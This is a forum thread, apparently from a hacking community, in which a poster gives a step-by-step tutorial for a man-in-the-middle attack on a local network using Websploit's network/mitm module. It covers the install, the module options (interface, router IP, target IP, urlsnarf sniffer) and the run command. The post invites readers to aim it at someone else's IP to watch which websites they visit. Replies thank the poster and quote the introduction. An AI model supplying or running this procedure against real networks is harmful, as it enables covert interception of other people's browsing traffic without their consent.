Marick 0 I assume most of you know what a Man in the Middle (MitM) attack is, but here is a diagram of a Man in the Middle attack. I will be using the Parrot Security OS, since it is my primary Linux dist when it comes to pentesting etc, but you can use most Linux distributions. For this MitM attack we are going to need Websploit, so let's get it installed :pogchamp: [hide]Step 1 Open up your terminal and type following command: sudo apt-get install websploit unless you already got it in your linux dist. Step 2 Launch websploit by typing: websploit Now your terminal should look like this Step 3 Now type: show modules The one we want to use is "network/mitm". We can select it by typing: use network/mitm Step 4 Type: show options We can see that we need to set all of the options, so let us do that! set Interface wlan0 set ROUTER 192.168.8.1 (To find yours do a netdiscover in a new terminal and it should be the first IP that appears. Normally it ends with a 1 or 0.) set TARGET 192.168.8.112 (I'm just targeting my computer, but you should replace this with your target's IP) set SNIFFER urlsnarf (Or you can use other sniffers) Step 5 And now for the fun: run If the mofo decides to go to a website you'll see it in the terminal LOL :smart: [/hide] Please consider giving a thanks or something if this was helpful Quote Share this post Link to post Share on other sites
GaetRekt 1 thanks for sharing it dude awesome ! Quote Share this post Link to post Share on other sites
oldjewish 1 I assume most of you know what a Man in the Middle (MitM) attack is, but here is a diagram of a Man in the Middle attack. I will be using the Parrot Security OS, since it is my primary Linux dist when it comes to pentesting etc, but you can use most Linux distributions. For this MitM attack we are going to need Websploit, so let's get it installed :pogchamp: Please consider giving a thanks or something if this was helpful in ova ma head Quote Share this post Link to post Share on other sites